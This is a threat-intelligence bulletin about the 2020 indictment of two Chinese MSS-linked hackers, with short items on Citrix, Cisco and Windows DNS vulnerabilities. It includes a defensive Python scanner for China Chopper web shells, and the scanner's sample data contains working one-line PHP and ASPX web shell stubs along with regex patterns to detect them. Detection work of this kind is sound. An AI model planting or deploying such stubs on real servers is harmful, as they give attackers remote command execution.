Chinese State-sponsored hackers indicted

Published on July 28th, 2020

In the Spotlight: Chinese State-sponsored hackers

Key Topics Covered

Executive Summary

Two hackers working on behalf of China's Ministry of State Security (MSS) have been indicted by the US Department of Justice for stealing terabytes of data from government organizations and companies around the world.

What happened?

Two Chinese nationals, LI Xiaoyu and DONG Jiazhi, are accused of taking part in a hacking campaign spanning more than ten years. They attacked companies and government organizations in the United States, Australia, Belgium, Germany, Japan, Lithuania, the Netherlands, Spain, South Korea, Sweden, and the United Kingdom, across sectors including high-tech manufacturing; medical device, civil, and industrial engineering; and business, educational, and gaming software. They repeatedly returned to organizations they had already compromised, and in at least one case attempted to extort cryptocurrency from a victim. Their most recent activity involved probing the networks of companies developing COVID-19 vaccines, testing technology, and treatments for vulnerabilities. Both were charged with conspiracy to commit computer fraud, conspiracy to commit theft of trade secrets, conspiracy to commit wire fraud, and seven counts of aggravated identity theft.

Hacker indictments – So what?

The two gained access to victims' networks by exploiting publicly known vulnerabilities in popular web server software, web application development suites, and software collaboration programs, and by targeting insecure default configurations in common applications. From that initial foothold they deployed web shells such as China Chopper, a one-line server-side script that executes whatever the attacker sends it in an HTTP POST, giving them remote command execution through the compromised web server, along with credential-stealing software. They compromised networks for their own profit, and they also stole information of interest to the PRC's Ministry of State Security (MSS), on whose behalf they worked.
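As an added example (not from the original summary or from the indictment), the following Python script shows what a hunt for China Chopper-style web shells looks like in practice: it scans a web root for script files that pass raw request input straight into eval(), which is the entire China Chopper server stub, and it applies a heuristic to web server access-log lines. The sample files and log lines are constructed for the example, and the POST-only log heuristic is an assumption of this example rather than a published rule.

```python
"""Hunt for China Chopper-style web shells in a web root and an access log.

Everything here runs on constructed sample data so it works offline:
  1. content scan: script files that feed raw request input straight into
     eval(); the China Chopper server side is a single line of exactly that
     shape in PHP, ASP or ASPX;
  2. log heuristic (an assumption of this example, not a published rule):
     script paths that are only ever POSTed to, never fetched with GET, and
     always without a Referer, which is how a web shell client talks to its
     stub but not how a browser drives a normal web application.
"""
import re
import tempfile
from collections import defaultdict
from pathlib import Path

SCRIPT_SUFFIXES = (".php", ".asp", ".aspx", ".jsp")

# eval()/execute of a request parameter in the languages China Chopper ships stubs for.
SHELL_PATTERNS = {
    "php-eval-of-request": re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[", re.I),
    "asp-eval-of-request": re.compile(r"eval\s*\(?\s*request\s*(?:\(|\[|\.item)", re.I),
}

# Constructed web root: two China Chopper stubs hidden among legitimate files.
SAMPLE_FILES = {
    "index.php": "<?php echo 'hello'; ?>\n",
    "old/login.asp": '<% Response.Write("ok") %>\n',
    "uploads/cache.php": "<?php @eval($_POST['password']);?>",
    "img/help.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
}

# Constructed Combined Log Format lines (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.7 - - [20/Jul/2020:10:01:12 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Jul/2020:10:01:15 +0000] "GET /img/logo.png HTTP/1.1" 200 2048 "http://example.test/index.php" "Mozilla/5.0"
203.0.113.7 - - [20/Jul/2020:10:06:55 +0000] "GET /login.php HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Jul/2020:10:07:00 +0000] "POST /login.php HTTP/1.1" 302 0 "http://example.test/login.php" "Mozilla/5.0"
198.51.100.23 - - [20/Jul/2020:10:05:40 +0000] "POST /uploads/cache.php HTTP/1.1" 200 312 "-" "Mozilla/4.0"
198.51.100.23 - - [20/Jul/2020:10:05:41 +0000] "POST /uploads/cache.php HTTP/1.1" 200 77 "-" "Mozilla/4.0"
198.51.100.23 - - [20/Jul/2020:10:06:02 +0000] "POST /img/help.aspx HTTP/1.1" 200 1540 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def build_sample_webroot():
    """Write the constructed files into a fresh temp directory; return its path."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
    return root


def scan_webroot(root):
    """Return {relative path: pattern name} for script files that eval() request input."""
    root = Path(root)
    hits = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_SUFFIXES:
            continue
        text = path.read_text(errors="ignore")
        for name, pattern in SHELL_PATTERNS.items():
            if pattern.search(text):
                hits[path.relative_to(root).as_posix()] = name
                break
    return hits


def post_only_scripts(log_lines):
    """Return script paths that only ever receive Referer-less POSTs (sorted)."""
    methods = defaultdict(set)
    referers = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Combined Log Format
        path = m["path"].split("?", 1)[0]
        if not path.lower().endswith(SCRIPT_SUFFIXES):
            continue
        methods[path].add(m["method"])
        referers[path].add(m["referer"])
    return sorted(p for p in methods
                  if methods[p] == {"POST"} and referers[p] <= {"-", ""})


if __name__ == "__main__":
    root = build_sample_webroot()
    for rel, name in scan_webroot(root).items():
        print(f"web shell candidate: {rel} ({name}, {(root / rel).stat().st_size} bytes)")
    for path in post_only_scripts(SAMPLE_LOG.splitlines()):
        print(f"POST-only script in access log: {path}")
```

The content scan is the reliable half: a legitimate application almost never passes a raw request parameter into eval(), and a hit on a file of a few dozen bytes under an upload or image directory deserves immediate attention. The log heuristic produces more noise (API endpoints that are only ever POSTed to will also appear), so treat it as a way to prioritise which scripts to inspect rather than as a verdict, and corroborate with file creation times and the web server's own process tree.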

Hacker indictments – What do I do?

Use a defense-in-depth approach to securing your network so that your team has more than one chance to catch malicious activity. If one control such as antivirus misses the compromise, analytics that look at network behaviour and endpoint activity can help your team spot anomalous activity much sooner. It is also worth measuring your network's detection coverage against the MITRE ATT&CK® model. As these two hackers showed, many attackers revisit their previous victims; knowing where your detection gaps are and bolstering those areas greatly reduces the risk of being compromised again.

Highlights in Brief

Citrix bugs allow unauthenticated code injection, data theft

Citrix has released an advisory listing vulnerabilities in Citrix Application Delivery Controller (ADC) and Citrix Gateway that could allow code injection, information disclosure, and denial of service. Four of the vulnerabilities can be exploited by an unauthenticated remote attacker. Citrix has not observed active exploitation of the bugs, but nonetheless advises customers to install the latest patches, which fully resolve all of the issues. Citrix also notes that these vulnerabilities are unrelated to CVE-2019-19781, the critical directory traversal bug in Citrix ADC and Gateway that allowed an unauthenticated attacker to execute arbitrary code because of improper handling of pathnames.

Cisco releases security fixes for critical VPN, router vulnerabilities

Cisco has released fixes for several vulnerabilities in its products, five of which are rated critical with a CVSS score of 9.8 and affect different Cisco product lines. Three of them affect Cisco's small business VPN firewalls and routers and, if exploited successfully, could allow attackers to execute arbitrary code as root. The other two, CVE-2020-3144 and CVE-2020-3140, affect the web-based management interface of those routers and Cisco Prime License Manager (PLM) respectively; successful exploitation could allow an attacker to bypass authentication or escalate privileges and compromise the system. Cisco advises all customers to apply the patches immediately, either by accepting automatic updates or by installing them manually.

CISA issues emergency vulnerability warning

The US Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive requiring all federal agencies to fix a critical vulnerability in Windows Server within 24 hours. This follows Microsoft's July Patch Tuesday, which fixed a 17-year-old bug with a CVSS score of 10.0. Tracked as CVE-2020-1350, the vulnerability is in Windows DNS Server, the domain name system service shipped with Windows Server. An attacker who can get a vulnerable server to process a crafted DNS message (for example, by inducing it to query an attacker-controlled domain and parse the malicious response) can execute arbitrary code; since DNS typically runs on domain controllers, this can lead to compromise of the entire infrastructure. Microsoft's advisory lists Windows Server 2008 through 2019 as affected, and the flaw dates back to Windows Server 2003 era code. A registry-based workaround is also available and should be applied as soon as possible wherever patching is delayed: it limits the size of inbound TCP DNS messages by setting the DWORD value TcpReceivePacketSize to 0xFF00 under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters and restarting the DNS service.

Forward look


Appendix A

Language of uncertainty

Throughout this intelligence summary, Masergy assessed probability using qualitative statements from the following defined matrix. To give the reader perspective, each statement is bounded by a probability range.

Source evaluation

Masergy evaluated sources using the two matrices defined below, scoring the reliability of each source and that of the information gleaned from it.